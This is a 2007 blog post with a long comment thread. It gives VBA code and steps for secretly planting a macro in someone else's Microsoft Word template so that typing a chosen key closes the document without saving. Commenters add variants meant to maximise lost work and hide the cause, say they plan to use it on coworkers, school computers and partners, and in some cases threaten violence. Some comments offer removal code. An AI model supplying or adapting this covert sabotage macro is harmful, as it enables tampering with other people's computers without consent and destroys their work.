Microsoft Word Prank
- Filed under: Computer Pranks
- Date: Nov 22,2007
What is the most common letter in the English language? E right? Well, what would you do if every time you typed “E” in Microsoft Word, it closed your word document and didn’t save any of your work. Well you might throw your computer out the window and kill who ever did it to you. This computer prank will drive your office friends crazy. So hell lets do it right?
Step 1: Open up Micro Soft Word
Step2: Press alt F11, this will open up a vba editor for word.
Step3: In project window on the left there should be a title “Normal” this is your default template. Select the default document underneath it.
Step4: Copy and past this code into the document
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:="TestKeybinding"
End Sub
Sub TestKeybinding()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub
Step5: Close word
Step6: Enjoy
If you did this correctly the next time they load word this code will be loaded. What it will do is every time the key “E” is pressed, it will close the document and NOT SAVE. You can change the key to anything you like and below I have listed some different key options. Have fun and unleash hell.
Key Options
To change the key from E to something else replace this piece of the code in bold
.KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE)
If you want to use a different letter it is: wdKeyYOURLETTER
If you want to use a key other than a letter or a number, it usualy is the keys name.
Example: wdKeyBackspace
Try out different options, its a lot of fun.
Student Credit Cards

177 Responses for "Microsoft Word Prank"
This would be a cruel thing to do to someone, if I noticed this I would find out from who had did it. From the list of those who had access to my computer, I would then promptly beat them to near death.
This sounds like some serious fun.
Won’t the document just close as soon as they type the first E? I mean, my comment, if it were a Word document, would have been closed before I had typed three words.
Annoying, sure. Devastating? Wouldn’t get the chance to be.
Making it E would give it away too fast, to be even meaner, make it q, u, v, or z. That way, they will have completed more of their document, and may do it more than once. Also, This is a horrible thing to do, destroying someone’s hard work is very mean. Don’t do it. (just because I tell you how doesn’t mean I approve (-:)
E is the fastest way… That is why I used it as an example. Easy to do and easy to test. If you are out to be mean use something like backspace or “G”. It will be used its just a matter of when.
I’d make it the colon, the @ and the apostrophe.
This is mean… you should stick with the usefull stuff…
Would it be possible to have it close when two keys are pressed at the same time?
Say, for a random example, Ctrl+S?
Hmm, a good way to get people to switch to open source things. “Look, whenever you type this key, the document closes and you lose all your work in Word. It doesn’t do this in OpenOffice or StarOffice (I think that’s what it is called). We should use on of those instead and drop Microsoft Office.
Is it possible to make this save the work before closing?
unassuming , yes Key binding is actually designed for press multiple keys. Like Control Alt Del.
Just do BuildKeyCode(wdKeyE, wdKeyF) Now when e and f are press at the same time it will call the code
Markus
Dont worry this was just something fun to do.
PAZ yes
x.close(false) should x.close(true)
My god :O
That’d wreak horrible things to me, I always start my word documents by labeling it with my name…
is there a way to turn this off later on, after we’ve had our fun?
Ooo, this almost wants to make me install windows again…
Ravi,
You can just tell them where the codes is and remove it. GONE.
It doesnt work for me!!!!!!!!!!!!!!!!!!! I do just what you say,
hit alt-f11,
the window says “microsoft visual basic” and one inside it that says “project-project”,
go to “normal”-”microsoft word objects”-”This document”,
I then paste the info, nothing happens. WTF did I do wrong?!?!? I NEED to do this. Alot of vulnerable people around
Bob
Change the first sub to this
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyE), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub
I have the same problem.
Even with the new code…
WTF?
you need to re-type the “
What versions of word does this work for?
I did this on 2007. If you are using an older version tell me what the errors is and maybe i’ll be able to fix it.
If the macro does not work on your first try, make sure you re type the “
In my version, the keybindings.add method had a different signature. I had to use the numberical ASCII code for the key.
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add wdKeyCategoryCommand, “TestKeybinding”, 69
End Sub
Don, Thanks for looking into that. If you could find out what version you are using I will add that to the tutorial.
Sure,
its Word 2002 sp3.
Hey… it´s not working. Maybe I am very stupid but I did what you mentioned and nothing happens.
Can anybody help me?
Marky, Did you close out office and then re-open? The code needs to be loaded first. You can also hit the run button in the editor to test it out.
make sure when you close word to save your normal template
Mmmmm— I am doing right, but it won´t work.
Please, can you copy/paste EXACTLY the code i would need? It will be useful for me, ha ha ha.
Shift I, that sound like the best result. Also a fun thing to do is to change the auto correct to misspell the name of a person who uses the computer frequently. I did that to some girls in highschool and they started crying because they weren’t graded for their journals(because of the wrong name)
How do i change it back to normal?
Does this work on the Mac version of Office?
Much more funnier if you use this trick with a less used keystroke: doing that the probability the used has written a long (and precious) document is bigger (and bigger is the damage too
Jeena, I agree. That is why I left key options on the bottom of the post. I picked E because it was the quickest way to get a result and I’m not as evil as most people.
Ryan,
I am not sure. I don’t have a MAC but if you could test it on a mac machine that would be KICK ASS! Try it out, I’m sure they have vba or something like it for Office for Mac’s.
Cordell, Erase the code.
Marky Mark, Have you been able to figure it out yet?
Ha ha! What a cruel world.
It really does sound interesting..^^..I will give a shot .
I just tried this, then deleted the code and now i cant use my e on word. please help me urgently. Thanks
AAA, If you deleted the code it should work. Close out Word and see if the code is still there when you re-open. If it is you need to delete the code again, but this time press ctrl+S and save the normal template.
the code isnt there and if i save the template and exit word and reopen it, it still doesnt work. Is there code to make the e key work again. Caps lock E works though just not lower case e. This is really frustrating!
I also tried a system restore and a restart but it did not work by the way.
It doesn’t work/? At least not for me? What am I doing wrong?
Did you re-type the “s
Brilliant! I’m going to have to save this code and use it on all my friends who use Windows and Microsoft products. I’m an avid Mac fan, so I love to try to convert my friends, and you know, it may just help! HA!
Matt U, Well I dont see this as a security flaw because if Macs offered a programming language for their office utilities this would be possible there too.
But hey if that is all it takes to convert some one from PC to a one button mouse idiot box thats fine by me
Cheers! Well, while I love that you at least argue in a civilized way, but I must let you know, there is now FOUR buttons on the new mouses. Just thought I’d let you know.
Oh, and do not say it’s just ripping off PCs, because who know how much was “borrowed” from Macs over the years.
And while also, I would like to mention, if this makes you feel better, that this is kind of more derected at my more…. gullible friends.
Touch the computer and I will break your fingers.
What a bunch of cruel people you guys are! Its probably way more instructive to introduce this macro technique as a means of helping with repetitive tasks rather than as a prank.
Hey, this isnt working for me no matter what I do. I type the ” and all that, even closed word before trying.
Halp!
i’d be pissed.
Zoe, this isn’t really all that cruel. If you keep the letter on E or spacebar, the person barley starts and it goes away. IT is cruel if you never do anything to fix it.
Joe what version of Word are you using. I did this on 2003
Matt U, I always knew those Mac guys were sensitive but not emo
Specific directions for undoing this, might be a good idea, too, eh?
Um, you delete the code and restart word.
personally i edited to code, when they press “e” they get “eeeeeeeeeeeeeeeeeeeeeeee”. =]
Even better… make it S.
(Ctrl+S is save)
and then leave the house. Quickly.
Laurel, you could change it to be Ctrl, S not just S. Just add a comma after the first key stroke and put the next one. I dont believe there is a limit to how many key combinations either
ok im doing it on word 2007 like ur and its doing noithng and i retyped the “,s
Austin, I just did it in 2007 and had no problems. Did you close word and restart. you can also step through the code press f8 if you get an error tell me where it occurs for you.
dude that is wick!!!!!
Hey austin, turn your macro security down to low!
Try this one on for size. Not only is it not a frequently used key “del”, it prompts a message basically letting them know they’ve been pwnd! I’m evil i know heehee
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(Arg1:=wdKeyDelete), KeyCategory:=wdKeyCategoryCommand, _
Command:=”TestKeybinding”
End Sub
Sub TestKeybinding()
haahhahahah”
Dim x As Document
Set x = ActiveDocument
x.Close (False)
MsgBox “I really hope that wasn’t an important document you were trying to type up
End Sub
I can’t figure out how to save the new template. The code is always gone when I reopen word.
i did this on a the server computer at school and made it ‘h’ ha ha evil now anyone who goes in word at school can’t type anything decent ha ha ha ha
Não funcionou no Office 2007.
Doesn´t work in office 2007.
If someone did this to me and caused me hours of grief I would.
1. Get them fired if it was at work for security breaching.
2. Toss there computer on the ground to break it.
3. Beat them to a pulp or shoot them.
You dont do crap like this without getting punished. God forbid they laugh and come up to me saying it was a joke. If I fail a class because I couldnt use word for 3 days because of this and missed the due date I would tear him apart then try to take legal action.
im gonn put it as ctl+v so when they try to copy paste… meh i cant be bothered
so what happens if you use f11 as the “hot key”? How do you get to the code input otherwise?
Word has a button you can press to get into code view… Alt F11 is the fast way…
Okay, I tried this, and it works… But I went to delete it, and it doesn’t show any code to delete. If I go back into word, the e key doesn’t do anything. (Not closing it either.)
I tried exiting, saving the boxes with no code, etc, and nothing has been working, with no code to delete, I can’t change it. Is there a code I can put in to return it to normal, or an edit to that one that will make it act normal again?
hey Kay, i am having the same problem. i cannot get the lower ‘e’ to work again…HELP
every time i close word (after putting in the code) then reopen it, it doesnt work and the code is gone..
kay, i too am having the same problem…HELP!
I think I’ll just prank someone using AutoCorrect, where the word ‘the’ is replaced by another word =)
awesome!! can’t wait to try it out…*evil grin*
heh just use the spacebar in this
that would screw anyone up rapidly
People pranking yourselves…lol.
That’s what you get for trying out such an evil prank.
This is fucking sweet. A+.
To those with the e problem, just clear all the code (if not already) and put this in:
Sub clear()
KeyBindings.ClearAll
ThisDocument.clear
End Sub
Then get the VB editor to run it through. It WILL appear to lock up. Let it go, and eventually you will get an error (Error 28). Dismiss it, then erase all, and save. I have no idea what else this might clear. Someone wish to clear this up/fix code to not throw error?
Has anyone noticed the irony here? I refer to the trouble-shooting issues set forth above regarding the code issues (i.e. AAA; Joe; Austin Gore et. al.).
I mean, many start out trying it on their own computer in order to screw with others , yet end up screwing themselves up! The irony is palpable. Typical Windows (which is my OS).
Well done Jeff, thank you for the insight and resulting comments.
Best,
Mr. Feasor
Dudes, I think something is screwed up with my computer. I did the trick above, but now ever time I open word and type “E” it closes. WTF? I knew that code listed here was probably a virus! Argg.
I had to compile it so that it worked, I also had to compile after I deleted the code for Word to work normally.
I was using Word 2003 v. 11.5604.5606
If the key is not working for you I have no idea why. I have had no problem what so ever after the code is erased.
There’s GOT TO BE a way to make it happen so that whenever someone types “e” some phrase or word(chosen by the programmer) would appear.
Such as this.
Hi! My name is…
Hi! My namILIKEPENISLOL is…
The only question is how…I’m sure you know.
Nice prank. Gota love macros and vbscript. Thank Microsoft for making this work on your computers. Until then, OpenOffice.org FTW!!!
ZOMG! I hat this! Sombody hackd into my computar and mad my comp crash whn I us tha 5th lattar! Halp!!!
I love this trick! My mate and i are forever finding new ways to hack each others computers but i must admit this is something i never thought of…. and neither did he
oh how the tears of joyous merriment stream down my face… thank you!!!
This will be so fun to do.
I tried the code and it worked fine. Later when I deleted the code i couldn’t get my e’s back….so i tried Jordan’s code and and it worked! Thanks Jordan.
I had the problem with the no-lowercase-e as well as those many other people. And, like etzen, I tried Jordan’s code and, like etzen, it worked! Double praise for you!
Doesn’t anyone have the sense to mirror their machines before farting around?
ok, this sounds awsome but it isnt working whenever i try it. i copy-paste the code, re-type the quotation marks, and then i exit word. i open it back up but the “e” key still works fine. the code is still there, but nothing happens. any help?
Kiltman: Use the following code instead:
Public Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add wdKeyCategoryCommand, “TestKeybinding”, BuildKeyCode(wdKeyE)
End Sub
Public Sub RemoveKeyBinding()
KeyBindings.Key(BuildKeyCode(wdKeyE)).Clear
End Sub
Public Sub TestKeybinding()
Selection.Range.InsertAfter “ILIKEPENISLOL”
End Sub
[...] from HackNMod sent this hack where you can automatically close Microsoft Word when you victim type ‘E’. Just don’t blame me if you get fired. If you do get fired, you can start making whole bunch [...]
This will go in the list of little pranks I like to pull on people who leave their workstations unattended and unlocked.
One of your favourite ones is to tell Windows to turn the screen sideways by pressing ctrl-alt-left-arrow. Surprisingly few people know how to fix that and will end up tilting their head sideways for long enough to restart the computer.
In the end, they learn to lock their workstations before walking away from them… which is the ultimate goal. Nothing wrong with having a bit of fun along the way…
Lol this is so cool im gonna do this at school with ctrl s!
Why not go the whole nine yards and use a random letter or number each time word is opened. This will make it impossible to tie the problem down to a specific cause except that maybe there is a bad interrupt from the keyboard. Will drive tech support mad.
hehe, that’s evil. Think I’ll have to try it out now. My gf is busy cooking dinner and her laptop is right next to me.
hey can someone help me i copied it and pasted it and then i exited then it says save should i safe? and when i save it says[cannot save because ther is no macros wtf help me please
haha kickass time to do it at school!
I had to laugh all the time from top to the last comment. Funny.
Idea & creativity is infinity!
Bad or good is not matters here!
Keep it UP!
My lowercase ‘e’ has broken after using this prank. It worked and then when I removed the code ‘e’ stopped working, uppercase ‘E’ does though. How do I fix this, I’ve tried re-entering the code saving normal, then deleting it again and saving normal again but still ‘e’ doesn’t work!
Any ideas?
hay would this work at my school where you login to a computer using a different user name and password for every student… that would ruin so many peoples work i would enjoy watchen them struggle with trying to fix it and watch our stupid tech try to fix it lol.
Kyle, no it wont. It is bound to their normal template. Plus my intentions aren’t to “HURT” others, but get a good laugh out of it
wtf!
Use OpenOffice!
Microsux, most macros can be changed with very little work to work in open office.
The reason they can be changed is macros aren’t designed to hurt in, but to help, I’m just manipulating common techniques. Most of these pranks I actually used for good before I converted them over.
hello, I have done this prank on my friend, and now I have attempted to fix this, but have managed to rid him of word shutting down, but now, the lowercase “e” will no longer type on his word document. Is there any way to fix this?
Public Sub RemoveKeyBinding()
KeyBindings.Key(BuildKeyCode(wdKeyE)).Clear
End Sub
run that sub
Hey, firstly this sounds ACE
but …. I have word 2007, I press Alt+F11 and nothing happens :s please help.
Laurel, you could change it to be Ctrl, S not just S. Just add a comma after the first key stroke and put the next one. I dont believe there is a limit to how many key combinations either
I ran:
Public Sub RemoveKeyBinding()
KeyBindings.Key(BuildKeyCode(wdKeyE)).Clear
End Sub
but nothing happened and my friend is still unable to use his “e” on microsoft word.
Thanks
i like ctrl+s and passing a true to the close method. that way it just freaks em out.
thnx for the idea
Hah. This looks great.
Does anyone know if this affects the whole computer or just the user who was logged on at the time? Because my sister’s account is on the same comp. as mine, and I want to prank her without pranking myself. =]
Isn’t that maybe just one step too far? I think I’d probably fail to see the funny side of things there…
Oh well, each to their own I suppose.
Ben, that is one of the main reasons I bind it “E” who doesn’t type “E” within the first 20 seconds of typing. If they started the document they woudn’t get far. If it was an old document then it wouldn’t remove their old work….
Thats an evil idea, what if I cleared the document then deleted and saved. So if they had a 20 page paper and started again it would delete it all and clear it. I could of course save the original under another name just for a freak out factor!
I am not sure if this has already been mentioned, but you can do a similar thing on Mac (office 2004), by going to Tools > Macro > Visual Basic Editor, then just entering to code how you would on windoze.
but since this is my computer, I have not tried it yet, I will let someone else find out the hard way…
i am retyping the quotations and everything.
i have even used some of the codes .
i am using ms word 2002
and it isnt working
i am doing everything right
i am just kind of confused on what to
retype in the quotations,
or if i even need the quotations
Idiot
I updated the page so if its not working your just an idiot
What I meant was you are a juvenile moron.
Go out and do something worthwhile with your life.
Paul, what I meant is if you can’t figure this out your an idiot.
As for something worthwhile in my life, where do you think I learned how to program ? Awh Yes at college, then my job where I do something worthwhile with my life…
And this pointless sites revenue is must also be worthless
not sure if this has already been suggested, but here is code for Word 2003, it seems to work for me (retype the ” “)
Sub AddKeyBinding()
CustomizationContext = NormalTemplate
KeyBindings.Add wdKeyCategoryCommand0, TestKeybinding, 69
End Sub
Sub “TestKeybinding”()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub
Private Sub Document_New()
End Sub
ah i coppied what you put up and it didnt work it all just removed the use of the letter i used, tried it on e and t and now i cant use those letters at all, i deleted the script and saved it and i still dont have the use of them
@Brayden
Oh the prank works, but to remove it use this code
Public Sub RemoveKeyBinding()
KeyBindings.Key(BuildKeyCode(wdKeyE)).Clear
End Sub
Thanks
I have a new project for some stick in the muds at work.
Use this code to be able to turn it on and off. You have to run the CommenceAggravation and RemoveAggravation macros to get it rolling. After that, F1 turns it on and F2 turns it off. Remember to clear any previous keybinding you had by running the DisableKeybinding macro. If you don’t, the key won’t work. Just modify the macro for whatever key you want to reset and run it. Then switch it back. I have it setup to be triggered by the letter u since it’s common and not obvious like a spacebar. To run the macros click view/toolbars/visual basic and click the play button to access them. Make sure you remove the toolbar when your done or they will notice it. You can turn it on and off with one key and they will think they’re crazy. Have fun.
Sub CommenceAggravation()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyF1), KeyCategory:=wdKeyCategoryCommand, _
Command:=”EnableKeybinding”
End Sub
Sub RemoveAggravation()
CustomizationContext = NormalTemplate
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyF2), KeyCategory:=wdKeyCategoryCommand, _
Command:=”DisableKeybinding”
End Sub
Sub EnableKeybinding()
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyU), KeyCategory:=wdKeyCategoryCommand, _
Command:=”ShutEmDown”
End Sub
Public Sub DisableKeyBinding()
KeyBindings.Key(BuildKeyCode(wdKeyU)).Clear
End Sub
Sub ShutEmDown()
Dim x As Document
Set x = ActiveDocument
x.Close (False)
End Sub
great. now that I got it working, how do i make it stop?
You can manually run the “disablekeybinding” macro or you can press F2 while in MS Word. That disables it. You can press F1 while in MS Word to turn it back on. When you want to remove it off the computer completely, run the “disablekeybinding” macro before you delete all the code. If you don’t that key won’t work. If that happens just re-enter the text for the “disablekeybinding” macro and set it to whatever key you want to fix. Ex.( If you want to clear the binding for the space bar key, make the one code line read….KeyBindings.Key(BuildKeyCode(wdKeySpacebar)).Clear
[...] word document and didn’t save any of your work. Funny huh. Only if you’re a jerk like me. step 1…http://www.iambetterthanu.com/2007/11/22/microsoft-word-prank/MS05-031: Vulnerability in step-by-step interactive training could …Microsoft word 2000 step by [...]
Really cool would be if you could use a word instead of just a letter, so that whenever they typed your last name (or theirs), Word would quit. This would be for the human resource manager’s computer. They would never figure out why they aren’t able to add documents to your file. Awesomely cool would be if this same function could be added to Microsoft Outlook and Outlook Express.
I am glad we use Macs at our house. What a childish and MEAN thing to do
f5 makes the program run. and if you delete the code if you press f5, it will stay deleted
Oops! that’s going to be the wrong way of fun…
thats not nice but it looks like fun
What is even better is to change the font size to a random size between 6 and 12. They won’t lose any information but will spend at least a half hour trying to figure out what is happening and their call everyone their cubicle. You could also change the color of the text, font style, etc…
(VBA is fun…)
This is awesome, ive just done it on my girlfriend and she threw her laptop across the room and now its broke and she’s crying her eyes out hahahahahahahahaha!!! thank you!!! hahaha
plop u suck i love brendan
I just done this to my brother, man is he #@#@& mad.
ahahahahaa don’t piss me off i’ll change your ‘e’ http://tinyurl.com/2qxwmj
How sopho-moronic, witless, absurd, and off the radar screen of sanity.
Are there no bowling lanes left in your community?
What next, a auto insurance company TV commercial?
I like cheese
this didn’t work, F11 did nothing. what am i doing wrong?
This is regarding wiseguy’s code involving the F1 and F2 commands. The F1 command works, but sadly the F2 doesn’t. What could be the problem?
this….is….GENIUS!!!!
Yeah…’cause as a species we just don’t fuck with each other enough.
microsoft office pranks http://tinyurl.com/2qxwmj
omg i wana do this to my boss right now but ill get fired if they find out…
ill prob just do it to everyone in my entire office before i leave (quit).
It is mean, id never do it to any family or friends, but its work so i dont really give a shit.
this is perfect! thanks!
Microsoft Word Prank http://tinyurl.com/2qxwmj
I’m gonna do it at school for ALL computers. Thanks.
hah! awesome Microsoft Word prank. http://tinyurl.com/2qxwmj
Ahh!
That looks awesome xD
I’ll have to try it!!!
how do you change it back? just delete code??
Such a gay prank
Would be a shame if someone did this to a entire computer lab at a school. *evil grin*
Hey cool man!!!
i will do it on my college computer!!
thanx man!!
this is quite funny i may do it but would probably have to find a way to change it back
Cool, I’ll do this at the power plant I work at. Doooh.
ok, not really. I don’t want anyone to take me seriously and report me as a terrorist.
“I’m gonna do it at school for ALL computers. Thanks.”
dumbass, the normal.dot file is stored in your user directory. If you to this to ALL the computers you will still be the only one affected… lulz…
How do you change it back?
cool!!!!
if you don’t know how to change it back/fix it, don’t use it in the first place.
I hate script kiddies.
Here we are as human beings trying to spread world peace and social unity when you spring a prank like this?
Read any (all) of these comments and you’ll see people are just chomping at the bit to try this horrible “joke” so called, out on whoever they can!!! Seriously this could be the next world wide disease, spreading like wild fire…I like it!!!
>if you don’t know how to change it back/fix it, don’t use it in the first place.
If you give people a recipe to screw up computers then give’m the answer to undo their damage as well… dumbass
How much work to you really think you can get accomplished between the time you load Word and the time you press the e-key? The part where this script doesn’t save (oh the horror) makes it sound like a bigger deal than it really is.
Make it more effective by using a key that isn’t used as frequently. This accomplishes two things: First, the victim has time to type something that would be more crushing to lose. Two, this makes the solution more difficult to isolate and troubleshoot. An effect that takes effect every time you press “e” is much to easy to pinpoint.
>if you don’t know how to change it back/fix it, don’t use it in the first place.
Everybody starts someone where dumbass
Meanie, stfu. This is hilarious. God if only I had known this word prank sooner, when I was in high school, and in college. What fun I would have had. hehe =D
Lol… the irony is that the ones who are going to get pranked are the ones using this. Especially those dumb enough to set it to backspace or delete.
this is the cruelest prank i’ve ever seen.
imagine autosave is not there.
We have this young brat in our IT department who delights in stupid and annoying behaviour and I think this trick, if anonymously emailed to him, will provide the rest of us at the office the chance to take the little shit out back and break his sticky little fingers…. and his face.
Thanks. I’m looking for the knuckle-duster now….
I still cant do it!!
I have done everything like you said,,
but it doesn’t work!!!
please help me!!
Hey,
k i seriously want to do this to a good friend of mine for April fools or something. He’s a computer guy , should he be able to figure out how to undo it?
thanks
Leave a comment